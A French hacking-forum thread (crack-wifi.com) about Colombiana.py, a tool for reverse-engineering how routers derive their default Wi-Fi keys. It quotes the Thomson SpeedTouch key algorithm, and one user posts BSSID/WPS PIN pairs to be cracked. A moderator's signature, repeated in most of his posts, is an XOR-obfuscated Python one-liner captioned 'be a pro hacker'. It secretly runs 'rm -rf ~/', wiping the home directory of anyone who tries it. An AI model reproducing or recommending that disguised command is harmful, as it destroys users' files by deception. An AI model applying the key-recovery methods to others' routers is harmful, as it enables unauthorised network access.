Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-03-2012 23:01:01

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Colombiana.py 1.4 : Reverse Hasher récursif en python

Bonjour !

Comme je l'ai dit sur backtrack-fr, j'ai fini de recoder colombiana !

Dans cette nouvelle version, il y a :

weapon_forge.py
Fichier servant à créer colombiana_weapons.py, une base de fonctions pour l'attaque récursive

colombiana_weapons.py
Fichier créé par weapon_forge.py, contenant plein de fonctions choisies par l'utilisateur.

colombiana.py
Pour trouver les F telles que F(X) = Y dans un fichier CSV du type
x1;y1
x2;y2
x3;y3
x4;y4

Je vais bientôt (demain ou dimanche) mettre PBKDF2 et HMAC dans weapon_forge.py

Téléchargement


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 15-05-2012 19:03:27

manonyme
Membre
Inscription : 16-01-2012
Messages : 21

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Au risque de paraître noob, qu'est-ce que l'attaque récursive? J'ai rien trouvé de clair sur google.

Hors Ligne

#3 15-05-2012 21:04:43

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Normal, c'est un concept à moi \o/

Kevin Devine a écrit :

Take as example: “CP0615JT109 (53)”
Remove the CC and PP values: CP0615109
Convert the “XXX” values to hexadecimal: CP0615313039
Process with SHA-1: 742da831d2b657fa53d347301ec610e1ebf8a3d0
The last 3 bytes are converted to 6 byte string, and appended to the word “SpeedTouch” which becomes the default SSID: SpeedTouchF8A3D0
The first 5 bytes are converted to a 10 byte string which becomes the default WEP/WPA key: 742DA831D2

(C'est la faille des mots de passe par défaut des routeurs thomson)

Ici, à partir d'un jeu de données de départ (Numéro de série) auquel on applique des fonctions (on vire certains caractères, on convertit en hexa et on colle un SHA-1 sur le tout), si on prend les 3 derniers octets, on tombe pile sur l'ESSID.
Les 5 premiers correspondent au mot de passe par défaut.

Je me suis dit "mais le mec, comment il a fait ça ?" et j'ai eu l'idée de tout simplement tenter, à partir de données de départ, de trouver des données d'arrivée (en pratique, j'essaye sur un ou deux couples départ-arrivée) par quelles fonctions on passe.

Desfois ça marche, desfois non.

Ex :
entrée : "toto"
sortie : "729cd4"

d'instinct, tu ne détecte pas (j'espère !) que "729cd4" est les 6 derniers caractères du SHA1-1 du MD5 de "toto" en ascii.

Eh bien l'attaque récursive que je mène, c'est une combinaison de plein de fonctions à la suite.
Je teste le MD5(MD5(MD5(toto))) et je vois que c'est différent de 729cd4
et je teste pour un niveau donné de récursivité (ici, 3 fonctions à la suite) toutes les fonctions qui m'intéressent.

Dans la version que j'ai faite, je n'ai mis que des fonctions de hachage, en me basant sur l'exemple des thomson, et des extractions de caractères.

J'espère que tu as un peu compris.
(sinon, checke les anciens posts qui en parlent sur le site, j'ai mis des jolis screens assez clairs)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#4 16-05-2012 14:53:37

manonyme
Membre
Inscription : 16-01-2012
Messages : 21

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Okay d'accord, merci. Je vais fouiller sur le site (là je dois avouer, comme ça, j'ai pas vraiment saisi l'essence du truc).
En gros t'essaie de tâtonner pour tenter de retrouver les algorithmes de hashage des box?
D'ailleurs, si ceux-ci se ressemblent tous, pourquoi ne pas faire un script qui prend en argument l'ESSID, la clé correspondante, et tente de retrouver l'algorithme de hashage qui l'a donné en tenant plein de combinaisons du type
MD5(SHA1(ESSID))
SHA1(MD5(ESSID))
MD5(MD5(ESSID))
etc...

Hors Ligne

#5 16-05-2012 23:01:43

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Exact !
Sauf que je fais monter le niveau jusqu'au degré huit, avec une trentaine de fonctions customs \o/


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#6 17-05-2012 09:25:23

mzutg
Membre Indéboulonnable
Inscription : 29-04-2011
Messages : 118

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Salut. il me semblait que le MD5 était non reversible non ?( d'où les rainbowtables).

Hors Ligne

#7 17-05-2012 09:37:54

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Non, il n'est pas réversible.
Les rainbow table sont d'immenses listes de couples mot-hash, qui sont en pratique plus rapides à parcourir que de recalculer le md5 de chaque mot que tu veux tester.
Les hashs ne sont pas bijectifs. Donc soit tu les bruteforce (avec ou sans rainbow table), soit tu obtiens un ensemble infini de solutions ayant la même image.
La seconde solution est la plus élégante, et celle que l'on peut le moins mettre en place.
Même pour du CRC32 c'est pas facile, alors imagine du SHA512 ^^


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#8 08-04-2013 00:24:22

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 362

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Un petit up sur ce sujet puisque tu vas te remettre dessus d'ici peu. Tout d'abord pour souligner la puissance incroyable de ce tool qui est à mon avis sous estimé, c'est vraiment une pure machine à casser de l'algo big_smile

Ensuite des petites suggestions, donc d'abord le debug des fonctions d'encodage, et l'ajout de base16, base32, base64, unicode (rot13 et rot47?).

Et puis je pense qu'il serait sympa de coupler à colombiana un petit générateur qui faciliterait la création de database, genre validez les différents indices en entrée (un serial, une mac, un essid etc) et validez la sortie (passphrase, password, hash ou autre) et le générateur va créer lui meme la database appropriée.

Ah oui, vu que tu aura surement un peu de temps à consacrer à ce fabuleux outil pendant tes 6 mois de stage, il serait aussi intéressant de pouvoir prendre en compte les seeds basées sur la seconde ou le matériel a été fabriqué, on a vu ce genre de chose utilisée pour des algos à plusieurs reprises (par exemple ici Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)) en choisissant par exemple une année donnée (ou un mois). Ca risque d'etre assez lourd niveau temps de calcul mais ça peut donner des résultats intéressants.

Un sujet à surveiller de près, il y a des algos qui vont tomber smile

Hors Ligne

#9 08-04-2013 09:53:13

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

J'ai de suite pensé au générateur quand j'ai vu ce que tu lui a passé comme entrée.
J'ajouterais les méthodes que tu as dit.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#10 08-04-2013 11:47:21

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Des seeds seraient pas mal en effet car une liaison avec le temps et toujours ressorti dans la découverte d'un algo.Tant pis si le temps d'exec est un peu long ça peut toujours etre intérèssant.

Hors Ligne

#11 08-04-2013 14:09:22

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Antares_145 nous avait fait part d'un full dsiclosure sur routeurs ADBBroadband avec utilisation de seeds
Je ne retrouve plus où; mais le full dsiclosure c'est celui-ci A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness
( by Stefan Viehboeck, celui qui a mis à jours la possibilité d'une attaque brute force par protocole WPS avec wpscrack)
Ceci pour souligner la pertinence de la suggestion pour ce fabuleux travail que tu nous a offert. smile

Hors Ligne

#12 10-04-2013 19:36:00

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

[Suite à la demande de kcdtv]

Salut à tous !
Tout d'abord je voudrais vous féliciter pour le formidable travail que vous faites, notamment Spawn avec Colombiana.

Malheureusement je n'arrive pas à l'utiliser, mais je dispose de données qui pourraient nous être utiles .

L'un d'entre vous (Spawn ou M1ckey) pourrait-il les essayer dans Colombiana et nous dire ce que ca donne ?
Voici ma liste, c'est une série des 6 derniers caractères BSSID associés à leur PIN.

938028;15061591
941A8D;79489515
948BE4;37017422
9388E8;90467912
96C99F;12456789
A4CAFF;71095837
936D45;90427145

Merci de votre aide, A vous de jouer wink

Dernière modification par unsuns06 (10-04-2013 19:36:32)

Hors Ligne

#13 20-04-2013 15:25:58

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Personne pour m'aider ?

Hors Ligne

#14 20-04-2013 19:31:10

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Je regarderais ça quand j'aurais le temps.
Merci pour tes données, de quel type de box proviennent elles ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#15 20-04-2013 21:32:26

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

C'est des technicolor TD5130

Hors Ligne

#16 27-04-2013 21:56:59

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Coucou Spawn !

J'espère que tu vas bien.

Tu as toujours pas eu le temps de jeter un coup d'oeil ?

J'aimerai vraiment que tu m'aides à élucider le mystère, c'est vraiment frustrant comme tu peux l'imaginer wink

Merci infiniment !

Hors Ligne

#17 28-04-2013 20:03:08

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Et cette frustration accumulée ne te donnes pas l'envie.... de passer à l'action et d'essayer toi même ?  wink

18 jours à attendre, c'est vrais que c'est long... tongue

Hors Ligne

#18 14-05-2013 09:04:37

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

J'ai bien recu ton mail unsuns06.

Sache que l'ancienne version de colombiana (en python, disponible sur sourceforce) est fonctionnelle, je t'invite à l'essayer sur ton petit jeu de données.

Courage ! big_smile


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#19 14-05-2013 19:54:51

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Un tutoriel complet serait le bienvenu, j'ai essayé tout seul, en vain hmm.

Merci

Hors Ligne

#20 14-05-2013 20:27:44

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Je te fais ça.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#21 15-05-2013 16:49:11

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Voici la liste des méthodes qui seront supportées :

  \item des hashs cryptographiques utilisés, notamment :
  \begin{itemize}
    \item MD5
    \item SHA-1
    \item SHA-224
    \item SHA-256
    \item SHA-384
    \item SHA-512
    \item windows NTLM
  \end{itemize}
  \item le crc32
  \item des encodages (et décodages) courants :
  \begin{itemize}
    \item hexadécimal - ascii
    \item base16
    \item base32
    \item base64
    \item punycode (conversion des chaînes de caractères unicode en ascii)
    \item {\em percent-encoding} (\og URL encoding \fg)
  \end{itemize}
  \item des extractions de caractères :
  \begin{itemize}
    \item les n dernières lettres
    \item les n premières lettres
    \item une extraction à partir d'une liste d'indexes à piocher (soit une permutation si il y a autant d'indexes que de lettres dans la chaîne)
  \end{itemize}
  \item l'ajout d'un {\em salt} tiré d'un dictionnaire:
  \begin{itemize}
    \item avant la chaîne de caractères
    \item après la chaîne de caractères
  \end{itemize}

Vous en voyez d'autres à mettre ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#22 17-05-2013 09:56:52

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

J'aurai tout essayé mais je n'y arrive pas, merci quand même pour ton aide !

Hors Ligne

#23 18-05-2013 07:51:53

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

A première vue Spawn de mon côté je trouve ça bien complet et très prometteur. smile
Je n'y connais rien en cryptologie mais à première vue, sha, md5, seeds, hex....  Avec ça en faisant une wordlist très conventionnelle (bssid, essid, serial, combiner et permuter tout cela de diverses façons etc...) je crois que l'on pourrait des-encrypter 50%-75% des patrons connus en espagne.... et probablement en trouver quelques uns oubliés au passage....:)

Hors Ligne

#24 24-05-2013 22:21:44

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 362

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

Avec tout ça il y a déja de quoi faire mouliner du CPU pendant un bon moment big_smile

Hors Ligne

#25 05-06-2013 20:05:45

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : Colombiana.py 1.4 : Reverse Hasher récursif en python

L'un d'entre vous pourrait faire un essai de son côté avec mes données qui se trouvent plus haut?
Je lui en serait infiniment reconnaissant !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]